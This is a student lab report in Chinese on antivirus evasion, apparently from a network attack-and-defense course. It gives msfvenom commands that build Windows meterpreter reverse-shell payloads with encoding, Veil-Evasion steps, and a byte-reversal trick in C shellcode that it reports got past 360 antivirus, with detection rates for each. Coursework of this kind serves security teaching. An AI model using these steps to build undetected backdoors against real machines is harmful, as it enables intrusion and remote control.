• 20145337《网络对抗技术》免杀原理与实践


    20145337《网络对抗技术》免杀原理与实践


    基础问题回答

    1. 杀软是如何检测出恶意代码的?
      - 基于特征码的检测、启发式恶意软件检测、基于行为的恶意软件检测
    2. 免杀是做什么?
      - 即使病毒木马避免被杀软查杀的技术,如改变特征码、改变行为等
    3. 免杀的基本方法有哪些?
      - 加冷门壳
      - 加壳改壳
      - 加花指令
      - 改程序入口点

    实践总结与体会

    1. 通过这次实践,了解了免杀的基本原理。
    2. 实践之前,对于恶意代码及木马程序的了解过分依赖杀毒软件,但是并不知道其中杀毒、检测木马的原理。
    3. 瞒过杀毒软件很容易,略施小计就能成功,要时刻警惕电脑和个人信息的安全。

    离实战还缺些什么技术?

    1. 对生成后门的这些软件、平台使用不够熟练

    2. 对C语言、汇编工具的了解

    3. 实战中如何在靶机上注入后门程序并运行

    实践过程

    使用msf生成后门程序的检测

    • 原始文件,检出率56%(22/39)

    Msfvenom编码器

    • 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=192.168.59.128 LPORT=323 -f exe > firsttest.exe编码一次后,检出率没变

    • 编码多次,检出率51%(20/39)降低了一点

    Veil-Evasion生成可执行文件

    1. 输入veil-evasion打开软件

    2. 使用use查看有效载荷

    3. 大家都用python,我决定换一个,49创建一个ruby/meterpreter/rev_tcp可执行载荷

    4. 设定 LHOST=192.168.57.128,输入generate生成载荷

    5. 创建载荷,显示路径

    • 检出率23%(9/39)降低了不少

    • 360安全卫士没什么用,360杀毒可以检测到

    C语言 调用Shellcord

    1. 先使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.128 LPORT=3026 -f c生成一个c语言格式的Shellcode数组:

    2. 用该数组编写程序

    3. 编译后生成可执行文件 exp3.exe

    4. 在kali下打开msf监听进程,在靶机上运行可执行文件

    5. 被360发现了,还需要改进

    修改之逆序

    • 在原有的代码基础上,稍作修改,首尾交换。再次在kali下打开msf监听进程,在靶机上运行可执行文件
    • 成功
  • 相关阅读:
    Vue-router路由传参三种方法及区别
    Vue.mixins混入方法的使用
    移动端自适应方案—rem布局
    JS获取页面宽度高度及Vue页面自适应方案
    Vue实现文件的上传与下载
    Prometheus第六篇:prometheus高可用架构
    Prometheus第五篇:prometheus告警规则配置和通过alertmanager精准发送告警
    Prometheus第四篇:prometheus服务发现方式解析
    Prometheus第三篇:prometheus.yml配置解析
    Prometheus第二篇:Prometheus部署
  • 原文地址:https://www.cnblogs.com/5337my/p/6623546.html
Copyright © 2020-2023  润新知